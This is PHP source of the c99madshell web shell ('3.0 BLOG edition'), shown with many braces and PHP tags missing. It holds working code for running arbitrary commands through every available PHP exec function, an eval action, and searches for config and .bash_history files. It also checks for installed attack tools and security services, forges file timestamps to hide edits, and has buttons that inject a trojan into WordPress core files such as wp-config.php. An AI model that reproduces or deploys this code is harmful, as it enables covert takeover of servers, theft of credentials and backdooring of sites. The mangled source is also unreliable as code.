ini_set('display_errors', 1);

ini_set('display_startup_errors', 1);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

 

$ip = $_SERVER['REMOTE_ADDR'];

 

$allow_ext              = array('mysql','mysqli','ftp','curl','imap','sockets','mssql','sqlite');

$allow_program  = array('gcc','cc','ld','php','perl','python','ruby','make','tar','nc','locate','suidperl','wget','get','fetch','links','lynx','curl','lwp-mirror','lwp-download');

$allow_service  = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','tripwire','sxid','logcheck','logwatch');

@ob_implicit_flush(0);

function onphpshutdown()

 global $gzipencode,$ft;

  $v = @ob_get_contents();

  @ob_end_clean();

  @ob_start("ob_gzHandler");

  echo $v;

  @ob_end_flush();

 

function which($which) {

        $locate = myshellexec('which '.$which);

        if($locate) {

                return $locate;

        } else {

                return false;

        }

 

function save_file($file, $content) {

        global $win;

        if(!file_exists($file)) {

                return false;

        }

        clearstatcache();

        $filetime = filemtime($file);

        if(!is_writable($file)) {

                $fileperm = substr(decoct(fileperms($file)), -4, 4);

                @chmod($file, intval(0777,8));

                if(!is_writable($file)) {

                        return false;

                }

        }

        $handle = @fopen($file, 'w');

        if($handle === FALSE) {

                return false;

        }

        fwrite($handle, $content);

        fclose($handle);

        @touch($file, $filetime, $filetime);

        if(isset($fileperm) && !empty($fileperm)) {

                @chmod($file, intval($fileperm,8));

        }

        clearstatcache();

        return true;

function c99shexit() {

        onphpshutdown();

        exit;

function RecursFile($dir) {

        $files = array();

        if(substr($dir, -1) != DIRECTORY_SEPARATOR) {

                $dir .= DIRECTORY_SEPARATOR;

        }

        if(!file_exists($dir)) {

                return false;

        }

        clearstatcache(); // Чистим кеш

        $realpath = getcwd(); // Сохраняем текущий путь

        $handle = @opendir($dir);

        if(FALSE === $handle) {

                return false;

        }

        chdir($dir);

        while(FALSE !== ($file = readdir($handle))) {

                if('.' != $file && '..' != $file ) {

                        if(is_dir($file)) {

                                $recurs = RecursFile($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR);

                                if(is_array($recurs)) {

                                        $files = array_merge($files, $recurs);

                                }

                        } elseif(is_file($file)) {

                                $files[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file);

                        }

                }

        }

        closedir($handle);

        chdir($realpath); // Восстанавливаем путь

        clearstatcache(); // Чистим кеш

        //sort($files);

        return $files;

 

function RecursDir($dir) {

        $dirs = array();

 

        if(substr($dir, -1) != DIRECTORY_SEPARATOR) {

                $dir .= DIRECTORY_SEPARATOR;

        }

        if(!file_exists($dir)) {

                return false;

        }

        clearstatcache(); // Чистим кеш

        $realpath = getcwd(); // Сохраняем текущий путь

        $handle = @opendir($dir);

        if(FALSE === $handle) {

                return false;

        }

        chdir($dir);

        $dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir);

        while(FALSE !== ($file = readdir($handle))) {

                if('.' != $file && '..' != $file ) {

                        if(is_dir($file)) {

                                $dirs[] = str_replace(array('\\\\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR);

                                $recurs = RecursDir($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR);

                                if(is_array($recurs)) {

                                        $dirs = array_merge($dirs, $recurs);

                                }

                        }

                }

        }

        closedir($handle);

        chdir($realpath); // Восстанавливаем путь

        clearstatcache(); // Чистим кеш

        $dirs = array_unique($dirs);

        return $dirs;

 

function setRecursPerm($dir, $perm) {

        $good = 0;

        $bad = 0;

        $all = array_merge(RecursFile($dir), RecursDir($dir));

        foreach($all as $file) {

                if(@chmod($file, $perm)) {

                        $good++;

                } else {

                        $bad++;

                }

        }

        return $good.':'.$bad;

 

$win = strtolower(substr(PHP_OS,0,3)) == "win";

if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}

$_REQUEST = array_merge($_COOKIE,$_POST);

foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "3.0 BLOG edition";

if (empty($surl)){

        $surl = $_SERVER['PHP_SELF'];

$surl = htmlspecialchars($surl);

 

$curdir = "./";

$tmpdir = "";

$tmpdir_log = "./";

 

$sort_default = "0a";

$sort_save = TRUE;

 

 

$safemode_diskettes = array('a');

$hexdump_lines = 8;

$hexdump_rows = 24;

$nixpwdperpage = 100;

 

if (!$win) {

 $cmdaliases = array(

  array("-----------------------------------------------------------", "ls -la"),

  array("find config.inc.php files", "find / -type f -name config.inc.php"),

  array("find config* files", "find / -type f -name \"config*\""),

  array("find config* files in current dir", "find . -type f -name \"config*\""),

  array("find all writable folders and files", "find / -perm -2 -ls"),

  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),

  array("find all .bash_history files", "find / -type f -name .bash_history"),

  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),

  array("show opened ports", "netstat -an | grep -i listen")

 );

} else {

 $cmdaliases = array(

  array("-----------------------------------------------------------", "dir"),

  array("show opened ports", "netstat -an")

 );

 

$quicklaunch = array(

 array("<b><hr>Search</b>","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"),

 array("<b>PHP-code</b>","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"),

 array("<b>Self remove</b>","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"),

 

$highlight_background = "#c0c0c0";

$highlight_bg = "#FFFFFF";

$highlight_comment = "#6A6A6A";

$highlight_default = "#0000BB";

$highlight_html = "#1300FF";

$highlight_keyword = "#007700";

$highlight_string = "#000000";

 

@$f = $_REQUEST["f"];

 

if (isset($_POST['act'])) $act  = $_POST['act'];

if (isset($_POST['d'])) $d    = urldecode($_POST['d']); else $d=getcwd();

if (isset($_POST['sort'])) $sort = $_POST['sort'];

if (isset($_POST['f'])) $f    = urldecode($_POST['f']);

if (isset($_POST['ft'])) $ft   = $_POST['ft'];

if (isset($_POST['grep'])) $grep = $_POST['grep'];

if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort'];

if (isset($_POST['pid'])) $pid  = $_POST['pid'];

if (isset($_POST['sig'])) $sig  = $_POST['sig'];

if (isset($_POST['base64'])) $base64  = $_POST['base64'];

if (isset($_POST['fullhexdump'])) $fullhexdump  = $_POST['fullhexdump'];

if (isset($_POST['c'])) $c  = $_POST['c'];

if (isset($_POST['white'])) $white  = $_POST['white'];

if (isset($_POST['nixpasswd'])) $nixpasswd  = $_POST['nixpasswd'];

 

$lastdir = @realpath(".");

 

 

$disablefunc = @ini_get("disable_functions");

if (!empty($disablefunc))

 $disablefunc = str_replace(" ","",$disablefunc);

 $disablefunc = explode(",",$disablefunc);

} else {

        $disablefunc = array();

 

function str2mini($content,$len)

 if (strlen($content) > $len)

 {

  $len = ceil($len/2) - 2;

  return substr($content, 0,$len)."...".substr($content,-$len);

 }

 else {return $content;}

 

function listdir($start_dir='.') {

  $files = array();

  if (is_dir($start_dir)) {

    $fh = opendir($start_dir);

    while (($file = readdir($fh)) !== false) {

      # loop through the files, skipping . and .., and recursing if necessary

     if (strcmp($file, '.')==0 || strcmp($file, '..')==0) continue;

      $filepath = $start_dir . '/' . $file;

      if ( is_dir($filepath) )

        $files = array_merge($files, listdir($filepath));

      else

        array_push($files, $filepath);

    }

    closedir($fh);

  } else {

    # false if the function was called with an invalid non-directory argument

   $files = false;

  }

 return $files;

function view_size($size)

 if (!is_numeric($size)) {return FALSE;}

 else

 {

  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

  else {$size = $size . " B";}

  return $size;

 }

 

function fs_rmdir($d)

 $h = opendir($d);

 while (($o = readdir($h)) !== FALSE)

 {

  if (($o != ".") and ($o != ".."))

  {

   if (!is_dir($d.$o)) {unlink($d.$o);}

   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}

  }

 }

 closedir($h);

 rmdir($d);

 return !is_dir($d);

 

function fs_rmobj($o)

 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);

 if (is_dir($o))

 {

  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}

  return fs_rmdir($o);

 }

 elseif (is_file($o)) {return unlink($o);}

 else {return FALSE;}

 

 

 

function myshellexec($cfe)

 $res = '';

 if (!empty($cfe))

 {

  if(@function_exists('exec'))

   {

    @exec($cfe,$res);

    $res = join("\n",$res);

   }

  elseif(@function_exists('shell_exec'))

   {

    $res = @shell_exec($cfe);

   }

  elseif(@function_exists('system'))

   {

    @ob_start();

    @system($cfe);

    $res = @ob_get_contents();

    @ob_end_clean();

   }

  elseif(@function_exists('passthru'))

   {

    @ob_start();

    @passthru($cfe);

    $res = @ob_get_contents();

    @ob_end_clean();

   }

  elseif(@is_resource($f = @popen($cfe,"r")))

  {

   $res = "";

   if(@function_exists('fread') && @function_exists('feof')){

    while(!@feof($f)) { $res .= @fread($f,1024); }

   }else if(@function_exists('fgets') && @function_exists('feof')){

    while(!@feof($f)) { $res .= @fgets($f,1024); }

   }

   @pclose($f);

  }

  elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))

  {

   $res = "";

   if(@function_exists('fread') && @function_exists('feof')){

    while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}

   }else if(@function_exists('fgets') && @function_exists('feof')){

    while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}

   }

   @proc_close($f);

  }

  elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork'))

   {

    $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';

    $pid = @pcntl_fork();

    if ($pid == -1) {

     $res .= '[-] Could not children fork. c99shexit';

    } else if ($pid) {

         if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}

         else {$res .= '[-] Error. Command incorrect.';}

    } else {

         $cfe = array(" -e 'system(\"$cfe\")'");

         if(@pcntl_exec('/usr/bin/perl',$cfe)) c99shexit(0);

         if(@pcntl_exec('/usr/local/bin/perl',$cfe)) c99shexit(0);

         die();

    }

   }

 }

 return $res;

 

 

function tabsort($a,$b)

        global $v;

        return strnatcmp($a[$v], $b[$v]);

 

function view_perms($mode)

 if (($mode & 0xC000) === 0xC000) {$type = "s";}

 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

 else {$type = "?";}

 

 $owner["read"] = ($mode & 00400)?"r":"-";

 $owner["write"] = ($mode & 00200)?"w":"-";

 $owner["execute"] = ($mode & 00100)?"x":"-";

 $group["read"] = ($mode & 00040)?"r":"-";

 $group["write"] = ($mode & 00020)?"w":"-";

 $group["execute"] = ($mode & 00010)?"x":"-";

 $world["read"] = ($mode & 00004)?"r":"-";

 $world["write"] = ($mode & 00002)? "w":"-";

 $world["execute"] = ($mode & 00001)?"x":"-";

 

 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}

 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}

 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

 

 return $type.join("",$owner).join("",$group).join("",$world);

 

if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}

if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}

if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}

if (!function_exists("parse_perms"))

function parse_perms($mode)

 if (($mode & 0xC000) === 0xC000) {$t = "s";}

 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}

 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}

 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}

 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}

 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}

 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}

 else {$t = "?";}

 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;

 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;

 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;

 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);

 

function parsesort($sort)

 $one = intval($sort);

 $second = substr($sort,-1);

 if ($second != "d") {$second = "a";}

 return array($one,$second);

 

function view_perms_color($o)

 if (!@is_readable($o)) {return "<font color=red>".view_perms(@fileperms($o))."</font>";}

 elseif (!@is_writable($o)) {return "<font color=white>".view_perms(@fileperms($o))."</font>";}

 else {return "<font color=green>".view_perms(@fileperms($o))."</font>";}

 

 

 

function c99fsearch($d)

 global $found;

 global $found_d;

 global $found_f;

 global $search_i_f;

 global $search_i_d;

 global $a;

 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

 $h = opendir($d);

 while (($f = readdir($h)) !== FALSE)

 {

  if($f != "." && $f != "..")

  {

   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));

   if (is_dir($d.$f))

   {

    $search_i_d++;

    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}

    if (!is_link($d.$f)) {c99fsearch($d.$f);}

   }

   else

   {

    $search_i_f++;

    if ($bool)

    {

     if (!empty($a["text"]))

     {

      $r = @file_get_contents($d.$f);

      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}

      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}

      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}

      else {$bool = strpos(" ".$r,$a["text"],1);}

      if ($a["text_not"]) {$bool = !$bool;}

      if ($bool) {$found[] = $d.$f; $found_f++;}

     }

     else {$found[] = $d.$f; $found_f++;}

    }

   }

  }

 }

 closedir($h);

if(!isset($act)) {$act='';}

if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

 

header("Cache-Control: post-check=0, pre-check=0", FALSE);

if (empty($tmpdir))

 $tmpdir = ini_get("upload_tmp_dir");

 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}

$tmpdir = realpath($tmpdir);

$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);

if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}

if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}

else {$tmpdir_logs = realpath($tmpdir_logs);}

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

 $safemode = TRUE;

 $hsafemode = "<font color=red>ON (secure)</font>";

else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}

$v = @ini_get("open_basedir");

if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}

else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}

$sort = @htmlspecialchars($sort);

if (empty($sort)) {$sort = $sort_default;}

$sort[1] = strtolower($sort[1]);

$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'',getenv("SERVER_SOFTWARE"));

@ini_set("highlight.bg",$highlight_bg); //FFFFFF

@ini_set("highlight.comment",$highlight_comment); //#FF8000

@ini_set("highlight.default",$highlight_default); //#0000BB

@ini_set("highlight.html",$highlight_html); //#000000

@ini_set("highlight.keyword",$highlight_keyword); //#007700

@ini_set("highlight.string",$highlight_string); //#DD0000

if (!isset($actbox) || !is_array($actbox)) {$actbox = array();}

$dspact = $act = htmlspecialchars($act);

$disp_fullpath = $ls_arr = $notls = null;

$ud = urlencode($d);

?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value='<?php if(isset($wp_path)) echo($wp_path);?>'><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr>

 

<tr><td>

<p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p>

<p align="left"><b>System:&nbsp;<?php echo substr(php_uname(),0,90); ?></b>&nbsp;</p>

<?php

if(!$win && function_exists('posix_getgrgid') && function_exists('posix_getegid')) {

        echo('<p align="left"><b>User/Group:&nbsp;');

        $groupinfo = posix_getgrgid(posix_getegid());

        echo(get_current_user().'/'.$groupinfo['name']);

        echo('</b>&nbsp;</p>');

<p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u><?php echo(phpversion()) ?></u></b></a>

<p align="left"><b>Php modules:&nbsp;

$cur_ext = get_loaded_extensions();

echo('<font title="'.implode(',', $cur_ext).'">');

$intersect = array_intersect($allow_ext, $cur_ext);

echo(implode(', ', $intersect));

</font></b>&nbsp;</p>

if($disablefunc) {

        echo('<p align="left" style="color:red"><b>Disable functions:&nbsp;'.implode(', ', $disablefunc).'</b></p>');

 

if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {

        echo('<p align="left" style="color:red"><b>Mod Security:&nbsp;YES</b></p>');

if(!$win && $safemode === FALSE) {

        $pro = array();

        $ser = array();

        foreach($allow_program as $program) {

                if($locate = which($program)) {

                        $pro[] = '<font title="'.$locate.'">'.$program.'</font>';

                }

        }

        foreach($allow_service as $service) {

                if($locate = which($service)) {

                        $ser[] = '<font title="'.$locate.'">'.$service.'</font>';

                }

        }

        if($pro) {

                echo('<p align="left"><b>Install program:&nbsp;<font color="#00CCFF">'.implode(', ', $pro).'</font></b></p>');

 

        }

        if($ser) {

                echo('<p align="left"><b>Install service:&nbsp;'.implode(', ', $ser).'</b></p>');

        }

 

<p align="left"><b>Allow_url_fopen:&nbsp;<?php echo((@ini_get('allow_url_fopen'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p>

<p align="left"><b>Allow_url_include:&nbsp;<?php echo((@ini_get('allow_url_include'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p>

<p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p>

if(isset($wp_path)) {

        if(valid_wp_path($wp_path)) {

                draw_patch();

                draw_trojan();

        } else {

                unset($wp_path);

        }

if(!isset($wp_path)) {

        $wp_path = found_wp();

        if(valid_wp_path($wp_path)) {

                draw_patch();

                draw_trojan();

        } else {

                unset($wp_path);

        }

if(!isset($wp_path)) {

        echo('<p><font color=red>Wordpress Not Found! ');

        echo('<input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value=\'ls\';document.todo.wp_path.value=document.getElementById(\'wp_pat\').value;document.todo.submit();"></p>');

 

function draw_trojan() {

        echo('<p><font color=green>Trojan: </font>

 

        <input type="submit" id="index" value="index" style="font-size: 6pt;'.get_style('index').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'index\';document.todo.submit();"/>

        <input type="submit" id="wp-blog-header" value="wp-blog-header" style="font-size: 6pt;'.get_style('wp-blog-header').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-blog-header\';document.todo.submit();"/>

        <input type="submit" id="wp-config" value="wp-config" style="font-size: 6pt;'.get_style('wp-config').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-config\';document.todo.submit();"/>

        <input type="submit" id="wp-settings" value="wp-settings" style="font-size: 6pt;'.get_style('wp-settings').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-settings\';document.todo.submit();"/>

        <input type="submit" id="template-loader" value="template-loader" style="font-size: 6pt;'.get_style('template-loader').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template-loader\';document.todo.submit();"/>

        <input type="submit" id="template" value="template" style="font-size: 6pt;'.get_style('template').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template\';document.todo.submit();"/></p>');

function draw_patch() {

        echo('<p><font color=green>Patch: </font>

        <input type="submit" id="xmlrpc1" value="xmlrpc1" style="font-size: 6pt;'.get_style('xmlrpc1').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc1\';document.todo.submit();"/>

        <input type="submit" id="xmlrpc2" value="xmlrpc2" style="font-size: 6pt;'.get_style('xmlrpc2').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc2\';document.todo.submit();"/>

 

        <input type="submit" id="admin_ajax" value="admin_ajax" style="font-size: 6pt;'.get_style('admin_ajax').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'admin_ajax\';document.todo.submit();"/>

        <input type="submit" id="blog_name_sql" value="blog_name_sql" style="font-size: 6pt;'.get_style('blog_name_sql').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'blog_name_sql\';document.todo.submit();"/>

        <input type="submit" id="tb_id" value="tb_id" style="font-size: 6pt;'.get_style('tb_id').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'tb_id\';document.todo.submit();"/></p>');

function found_wp() {

        $path = @getcwd();

        if($path === false) {

                return false;

        }

        if(valid_wp_path($path)) {

                return $path;

        }

        if(preg_match('%(wp-(\w+))%i', $path, $ret)) {

                $path = substr($path, 0, strpos($path, $ret[0]));

                return $path;

        }

        if(preg_match('%(blog|wp|wordpress|blogs)%i', $path, $ret)) {

                $path = substr($path, 0, strpos($path, $ret[0])+strlen($ret[0])+1);

                return $path;

        }

        return false;

 

function valid_wp_path($path) {

        if($path === false) {

                return false;

        }

        if(file_exists($path.'wp-config.php')) {

                return true;

        } else {

                return false;

        }

 

function get_style($vuln) {

        global $wp_path;

        switch($vuln) {

                case 'xmlrpc1':

                case 'xmlrpc2':                 $file = $wp_path.'xmlrpc.php'; break;

                case 'admin_ajax':              $file = file_exists($wp_path.'wp-includes/pluggable.php')?$wp_path.'wp-includes/pluggable.php':$wp_path.'wp-includes/pluggable-functions.php'; break;

                case 'blog_name_sql':   $file = $wp_path.'wp-trackback.php'; break;

                case 'tb_id':                   $file = $wp_path.'wp-trackback.php'; break;

 

 

                case 'index':                   $file = $wp_path.'index.php'; break;

                case 'wp-blog-header':  $file = $wp_path.'wp-blog-header.php'; break;

                case 'wp-config':               $file = $wp_path.'wp-config.php'; break;

                case 'wp-settings':             $file = $wp_path.'wp-settings.php'; break;

                case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break;

                case 'template':                $file = $wp_path.'wp-trackback.ph'; break;

                default: return false;

        }

        if(!is_writable($file) && is_patching($vuln, $file)) {

                $style = 'background-color: yellow; color: black" disabled';

        } elseif(is_writable($file) && is_patching($vuln, $file)) {

                $style = 'background-color: yellow; color: black" disabled';

        } elseif(is_writable($file) && !is_patching($vuln, $file)) {

                $style = 'background-color: green; color: white"';

        } else {

                $style = 'background-color: #800000; color: #FFFFFF" disabled';

        }

        return $style;

 

 

function is_patching($vuln, $file) {

        if($vuln == 'index' || $vuln == 'wp-blog-header' || $vuln == 'wp-config' || $vuln == 'wp-settings' || $vuln == 'template-loader' || $vuln == 'template') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, 'flag_turcie') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        } elseif($vuln == 'xmlrpc1') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, '//\'pingback.ping\' => \'this:pingback_ping\',') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        } elseif($vuln == 'xmlrpc2') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        } elseif($vuln == 'admin_ajax') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, '$user_login = $wpdb->escape($user_login);') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        } elseif($vuln == 'blog_name_sql') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, '$blog_name = $wpdb->escape($blog_name);') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        } elseif($vuln == 'tb_id') {

                $content = @implode('', @file($file));

                if(!$content) {

                        return false;

                }

                if(strpos($content, '$tb_id = intval($tb_id);') !== FALSE) {

                        return true;

                } else {

                        return false;

                }

        }

<p align="left"><?php

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (empty($d)) {$d = @realpath(".");} elseif(@realpath($d)) {$d = @realpath($d);}

$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

$d = str_replace("\\\\","\\",$d);

$dispd = htmlspecialchars($d);

$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));

$i = 0;

foreach($pd as $b)

 $t = "";

 $j = 0;

 foreach ($e as $r)

 {

  $t.= $r.DIRECTORY_SEPARATOR;

  if ($j == $i) {break;}

  $j++;

 }

